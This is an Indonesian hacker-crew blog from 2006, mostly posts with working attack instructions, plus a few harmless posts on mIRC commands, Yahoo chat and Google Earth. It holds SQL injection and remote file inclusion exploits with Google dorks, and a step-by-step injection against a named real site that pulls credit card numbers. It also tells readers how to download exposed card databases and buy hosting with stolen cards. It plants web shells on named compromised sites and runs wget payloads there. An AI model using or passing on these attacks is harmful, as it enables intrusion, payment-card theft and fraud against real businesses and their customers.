muncul istilah "surfing the internet". Tahun 1994, situs internet telah tumbuh menjadi 3.000 alamat halaman, dan untuk pertama kalinya virtual-shopping atau e-retail muncul di internet. Dunia langsung berubah. Di tahun yang sama Yahoo! Didirikan, yang juga sekaligus tahun kelahiran Netscape Navigator 1.0. Selain itu, Pizza Hut tercatat sebagai pionir yang menerima order pizza online. Setahun kemudian internet sudah menjadi jalur di mana suara, gambar, bisa streaming sekaligus. Tahun 1996 transaksi perdagangan di internet sudah mencapai satu milyar dollar AS. Tahun 1997 situs internet sudah melewati 1,2 juta. Nama domain business.com mencapai rekor penjualan 150.000 dollar AS. Tahun 1998, situs internet tumbuh menjadi 4,2 juta, dan nama domain yang terdaftar sudah melewati angka dua juta. Tahun 1999 nama domain business.com terjual kembali 7,5 juta dollar AS. Tahun 2000 situs internet sudah melewati 21,1 juta. Luar biasa bukan ? Copyright © 2002 PT. Kompas Cyber Media

shopstorenow (orange.asp) sql injection

2006-12-27T08:22:00.000-08:00

shopstorenow (orange.asp) sql injection
*********************---Hitamputih crew---******************************** * * * *
* Discovered By : IbnuSina on www.hitamputih.biz *
* Contact : IbnuSina[at]crew-anker.com *
* vendor : http://www.shopstorenow.com/ *
* Greetz : Solpot,permenhack,barbarosa,cahgemblunkz,fung_men,setiawan * * and all member #hitamputih crew community http://www.hitam-putih.com/ * ***************************************************************************
poc :
http://sitename.com/[scriptPATH]/orange.asp?CatID=[sql]
google dork : "powered by shopstorenow"

sedikit banyak tentang command mirc

2006-12-27T07:36:00.000-08:00

global commands :
/server = buat masuk ke mirc contoh /server hitam-putih.com bis disingkat jadi /s
/nick = buat ganti nick contoh /nick tanpa tanda kurung loh yah
/join = buat join ke channel kesukaan anda contoh /join hitamputih bisa di singkat /j
/part = buat pergi dari channel bisa di ikuti dengan kata kata contoh /part #hitamputih see yu
/me = buat bikin tulisan tanpa ada tanda kurungya pada nick kita contoh /me brb
/ame = seperti /me cuman tulisan kita klihatan di semua channel yang kita joini
/amsg = hampir sama seperti /ame cuman masih ada tanda kurung pada nick kita
/query = buat chatting aam nick yang ada di channel contoh /query Elang13 bisa disingkat /q
/whois = buat nyari tau tentang satu nick contoh /whois Elang13 bisa disingkat /w
/notice = buat ngirim pricate massage,cuman munculnya dichannel contoh /notice Elang13 kamu ganteng deh
/invite = buat invite nick biar maasuk channel contoh /invite Elang13 #hitamputih
/quit = buat ninggalin server yang lu masukin bisa disingkat /q

/ns commands :
/ns register : buat register nick kesukaan ente
/ns set enforce on/off : buat proteksi nick ente biar ga bisa dipake orang lain
/ns set passwd : buat ganti password nick
/cs commands :
/cs register #channel password dicryption : buat bikin channel contoh /cs register #htamputih apayah selamat bergabung
/cs sop/aop #channel add/del : buat ngangkat atau delete sop aop di channel anda
/cs akick #channel add/del *!*@localhost / nick / ident : buat ngusir orang yang disukai ente hehe, contoh /cs akick #hitamputih add ~asu@123.456.789.01 cuman yang bisa ngejalanin sop ama pak founder doang :P~

udah dulu ah temen gw minta balik,kapan² di sambung command yang lain :D

OLE DB error sql injection for asp

2006-12-27T07:32:00.000-08:00

asp injek
pertama masukin ini
'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
kedua kaloumpamanya bisa ada kulum table contoh
http://krendlmachine.com/products/products.asp?PartNo=356,

(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
telusuri sampe dapet table Orders atau Users
NAH SETELAH TEMUI TABLE oRDERS misalnya
jadi sqlnya makin panjang
http://krendlmachine.com/products/products.asp?PartNo=356

(select%20top%201%20table_name%20from%20information_schema.tables%20WHERE%20TABLE_NAME%20NOT%20IN

('qryKMC','dtproperties','sysconstraints','syssegments'

,'EmpOpps','Faq','KMC','KMCOptions','Machines','Media','OrderDetail','Orders')))--sp_password
abis itu kita mulai menelusuri table Orders tadi caranya?
http://krendlmachine.com/products/products.asp?PartNo=356

%20and%201=convert(int,(SELECT%20TOP%201%20COLUMN_NAME%20FROM%

20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='orders'))--sp_password
lanjutkan dengan table berikutnya
http://krendlmachine.com/products/products.asp?PartNo=356

20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='orders'

%20AND%20COLUMN_NAME%20NOT%20IN%20('ID')))--sp_password
setelah itu kita telusuri colomnya
http://krendlmachine.com/products/products.asp?PartNo=356

20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='orders'))--sp_password
sampe data yang diperluin diangap lengkap
sekarang tahap terakhir masukin sql ini :
http://krendlmachine.com/products/products.asp?PartNo=356))

%2b'--'%2bconvert(varchar,isnull(convert(varchar,OrCrCardExp),'NULL'))

%2b''%2bconvert(varchar,isnull(convert(varchar,OrCrCard),'NULL'))

%2b'--'%2bconvert(varchar,isnull

(convert(varchar,OrCrCardNo),'NULL'))

%20from%20orders%20where%20ID%20not%20in('')%20order%20by%20OrderNo%20desc))--sp_password
sesuaikan dengan kolom yang didapat varchar,orcardno de el el

sazcart v1.5 (cart.php) Remote File include

2006-12-27T07:29:00.000-08:00

sazcart v1.5 (cart.php) Remote File include
*********************---Hitamputih crew---********************************
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
*Risk : High
* Greetz : *Solpot,permenhack,barbarosa,cahgemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community www.kaipank.org/forum
*especially thx to str0ke@milw0rm.com
***************************************************************************
bug found on admin/controls/cart.php
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;
exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?
google dork: "powered by sazcart"

Nuke Integration Project 7.65c (phpbb_root_path) Remote File include

2006-12-27T07:24:00.000-08:00

Nuke Integration Project 7.65c (phpbb_root_path) Remote File include *********************---Hitamputih crew---******************************** * * * * * Discovered By : IbnuSina on http://www.hitam-putih.com/ * * Contact : IbnuSina[at]crew-anker.com * * script download : http://sourceforge.net/projects/nip * * Greetz : Solpot,permenhack,barbarosa,cahgemblunkz,fung_men,setiawan * * and all member #hitamputih crew community http://www.hitam-putih.com/ * ***************************************************************************bug found on modules/Forums/admin/admin_users.php
$phpbb_root_path = './../';require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
require("../../../includes/bbcode.php");
require("../../../includes/functions_post.php");
require("../../../includes/functions_selects.php");
require("../../../includes/functions_validate.php");
exploit :
http://sitename.com/[NIP PATH]/modules/Forums/admin/admin_users.php?phpbb_root_path=HTTP://EVILCODE?
google dork: "PHP-Nuke Port by Tom Nitzschner site:gr"

ssh proxy

2006-12-27T06:39:00.000-08:00

bikin proxy lewat root??mungkin ga yah?
mungkin saja
lalu caranya?
ok siapin login root ente semua,trus buka dan ini langkah² nya

1. ketik nama domain atau ip root sampeyan di kotak bawah tulisan host name or ip addres
2. ketik terserah di kotak saved session
ini gambarnya

abis itu?
3. tarik kebawah dikotak sebelah kiri cari tulisan tunnel di kotak port ketik 1080,buletan dynamic klik,
4. add
seperti gambar dibawah ini :

5. tarik keatas lagi,cari tulisan Session klik,lalu save.akan muncul seperti gambar dibawah

udah gitu doang? ko ipnya tetep sama?
hehe setting dulu di IE ato mozzilanya
yang IE :
Tools ---> internet option ---> conection--->Lan Setting-->Advanced--->masukin di kotak sock 127.0.0.1 portnya 1080
mozzila :
option-->general--->connection option-->masukin dikotak sock 127.0.0.1 port 1080,uda sekarang coba cek ipny?
eng ing eeeeeeeeeeng
berubah!!!!!

bikin psy dari hostingan sendiri??(ga bermaksud ngajarin main carding)

2006-05-07T20:21:00.000-07:00

tulisan ini gw publish disini cuman sebagai pengetahuan aja.kalo di salah gunain, gw ga mau tau,:P~~
caranya siapin cc valid kalian xixixixi terus order domain nya diyahoo alamatnya disini http://smallbusiness.yahoo.com/domains/ abis itu order hostingnya di verio.com yang perlu diperhatiin waktu ngorder di verio adalah jangan make email gratisan cos ga bakalan aprove heuheue kalo gw biasanya make email dari mac.com tar dari verio dapet konfirmasi 2 kali 1. ucapan selamat datang dari web itu 2. kiriman dns dari verio nah setting dnsnya ke domain yang ada di yahoo. tunggu beberapa menit udah gitu tinggal buka umpamanya website yang lu beli http://www.jancuk.com/ buka dengan ditambah kata ControlPanel jadi www.jancuk.com/ControlPanel nah terus login make user name ama password yang dikasih verio, setelah itu donlot shell.php di http://pelemanhacklink.org/mark.rar extract file shell.php ke folder terus aplod ke direktory www/httpdc nah sekarang tinggal bikin psy bncnya caranya??? ketik dikotak execute di sebelah kiri atas wget http://hitam-putih.info/psybnc.tar
tar -zxvf psybnc.tar
cd .kin;./bikin ident port;./run conto cd .kin;./bikin mbuh 1234;./run
udah kalo dah jadi tinggal login ke mirc make psybnc bikinan dari hosting sendiri,, vhostnya nama domain yang kalian beli

nyari cc???

2006-05-07T15:54:00.000-07:00

heuheuehu,, mbuhlah sebenernya males banget nulis masalah yang satu ini,cos walopun dah ditulis tapi tetep aja masih ada yang nggrundel, udah ah bodo amat,xixixixi
bug yang satu ini bug yang masih gw pake soalnya ccnya valis valid euy,terus update lagi,heuheuehu
cari di googlr : allinurl:proddetail.asp?prod=

contoh : http://www.msasnow.org/proddetail.asp?prod=ACSASledRaffle
ganti tulisan proddtail.asp?prod=SG369 dengan fpdb/vsproducts.mdb
jadi www.msasnow.org/fpdb/vsproducts.mdb
udah tinggal donlot trus buka make ms akses,nah tuh ccnya keliatan,,xixixixii

install psybnc

2006-05-01T23:04:00.000-07:00

hueheuheu walaupn dah banyak yang tau cara install psybnc tapi gw tulis lagi ah biar lebih mantabz tul ga???

sebelumnya perlu di perhatiin sebelum memulai penginstalan psy bnc dari shell inject, adalah permission directory, dan apakah port web itu ada yang kebuka??
yaudah kita mulain aja ah

1. gw kasih contoh target yang permission direktorynya yes
http://hotornotjamaica.com/shell.php website yang bisa dimasukin shell.php itu menunjukan kalo permission dirktorynya yes
nah terus gimana cara install psy yang permission direktorynya yes ???

ini lebih mudah sebab bisa langsung wget ok mulai aja
1. wget hitam-putih.com/psybnc.tar
2. tar -zxvf psybnc.tar
3. cd .kin;./bikin ident port;./run ---> contoh cd .kin;./bikin mbuh 8888;./run

dah sekarang tinggal login ke psy yang baru dibikin itu
yaitu make ip atau nama website shell target tadi dan port yang kita bikin
ketik di status mirc kita /s hotornotjamaica.com 8888
enter
terus tar keluar

* Connecting to hotornotjamaica.com (8888)

--Welcome- psyBNC2.3.1
---psyBNC- Your IRC Client did not support a password. Please type /QUOTE PASS yourpassword to connect.
sekarang lu ketik /quote pass <>
enter
tanpa tanda kurung terus tar dari psy itu pv lu ngasih command command sebagi admin psy
nah terus tar lu disuruh masukin server lu ketik /addserver rumble.dal.net:7000
tar psy itu secara otomatis konek ke server yang lu add tadi , udah lu tinggal join kechannel kesukaan elu

2 . bikin psy di web shell target yang permission direktorynya no
mungkin kebanyakan temen temen gw sebelum bikin psy nyari dulu directory yang ga ada tulisan permission denniednya, tapi kalo gw mah langsung aja masukin ke folder /tmp cara bikinnya hampir sama
contih targetnya :

http://www.tabeebe.com/mag/modules/4nAlbum/public/
displayCategory.php?basepath=http://hitam-putih.info/saben.jpg?

bikinnya tinggal dimasukin ke folder /tmp caranya :

cd /tmp;wget hitam-putih.com/psybnc.tar
cd /tmp;tar -zxvf psybnc.tar
cd /tmp/.kin;./bikin ident port;./run

udah tinggal login ke psy kita caranya sama seperti yang diatas

Nb : kadang ada perbedaan antara web yang gunain linux ama freebsd command yang gw kasih diatas buat linux kalo buat free bsd
tinggal ganti wget dengan fetch sedangkan command yang lain tetep sama

uda dulu aw capey

pengalaman paling menyebalkan

2006-05-01T22:38:00.000-07:00

ada satu nick yang sama sekali ga gw kenal , tapi dia sok kenal, sok akrab , suka maksa lagi , dah gw ignore berkali kali aja tuh nick ampe tangan gw cape,hayyaaaaah mending kalo dah minta ngucapin makasih,dah dikasih minta yang lain,wedus ga seh??? dah dikasih hati minta pantat!!!
mo gw akick dari channel gw orang paling ga tega nge akick nick orang,puseeeeeeeng,

dua hari gw ga ol ada kabar lagi ada yang make nick gw, wasyah, emang gw belum enforce in nick gw seh, anak anak channel pada kaget, masa gw minta psy, ngakakaka aseli gw ketawa pas denger yang make nick gw minta psy,hahahaha,,, cah gemblung ,,,

nah sorenya gw online ada nick yang belum pernah gw liat sama sekali, ternyata dia orang yang make nick gw kemarin, pv gw minta psy, dah gw kasih minta dijadiin owner bot, gw tanya buat apaan minta owner bot?? dia jawab yabuat dipake. gw tanya lagi dipake buat apa?? dia jawab buat ngeramein chanek temen gw,orang bot gw tinggal satu satunya itu, mana mungkib bisa ngeramein channel,mungkin kalo gw dah ga sabaran gw dah berbuat yang ga ga sama dia,tapi alhamdulillah gw masih dikasih kesabaran sama Yang maha kuasa,

tapi gimanapun juga yang namanya sabar pasti suatu saat juga akan hilang walaupun karna khilaf.yaaaah gw berharap moga gw tetep dikasih kesabaran aja deh

Chatting di Ym tanpa make software??

2006-05-01T22:01:00.000-07:00

awalnya gw lagi cerita masalah yahoo messenger terus ada yang nanya,gw juga ga tau apa dia bener bener nanya ato cuman ngetes gw doank xixixixi
P : um emang bisa yah chattingan di YM tanpa make software??
G : iyes bisa.
P : wew caranya gimana um??
G : lu buka http://chat.yahoo.com terus login make user id lu ama passwordnya
P : trus ??
G : klik cari tulisan Chat now kalo ga salah
P : ga ada um tulisan chat now adanya Enter Chat Room
G : iyes itu maksud gw,hehe
P : terus??
G :gimana loadaing ngga??
P : iya um loading
G : kalo udah klik continue
P : lah om ko masuknya keroom luar siy??
G : iyes emang diset ke room itu,
P : terus kalo mo join ke room indo gimana om??
G : klik change room yang di atas room
P : ooh iya iya paham paham um huheuehe, ini sama kan kaya kita make software??
G : iyes sama, cuman kalo lu klik buton back semua yang lagi chattingan ama lu kehapus semua,
terus kalo masuk lagi lu masuknya kechannel yang luar tadi gitu
P : oooh gitu ya om
G : iyes

sedikit tulisan tentang google earth

2006-05-01T21:11:00.000-07:00

mungkin kalian udah lebih dahulu tau sebelum gw nulis ini,tapi gw yakkin masih banyak yang belum tau tentang apa sih google earth dan apa kegunaannya??
google earth adalah software yang dibuat oleh google yang bertugas mencari lokasi diseluruh dunia,softwarenya bisa didonlot gratis disini http://earth.google.com disitu google juga nyediain earth ang lain namun yang lainnya ini ga gratisan alias bayar,gunanya buat apa masing masing software punya kegunaan yang berbeda,kalo yang gratisan cuman buat nyari lokasi di seluruh dunia,nah yang beli gimana??
kalo yang beli lu liat aja keterangan yang ada dibawah product itu.
nah cara pakainya gimana yang gratisan??
ok,,,,
pertama lu donlot softwarenya kalo pengin yang lumayan mantap gambarnya pilih yang beta, install,udah ketik di kotak serachnya enter ato klik gambar yang disebelah kotak ,bisa dilihat pada gambar dibawah

http://www.geocities.com/shella_kapas/earth.JPG

mulai bikin blog

2006-05-01T18:43:00.000-07:00

sebenernya dulu dah pernah punya web blog tapi keknya dah koed xixixixi
ya,,,,,,,,
gara gara ga pernah di update terus pagenya juga dikosongin kituh jadi sekarang mulai dari awal lagi dah :(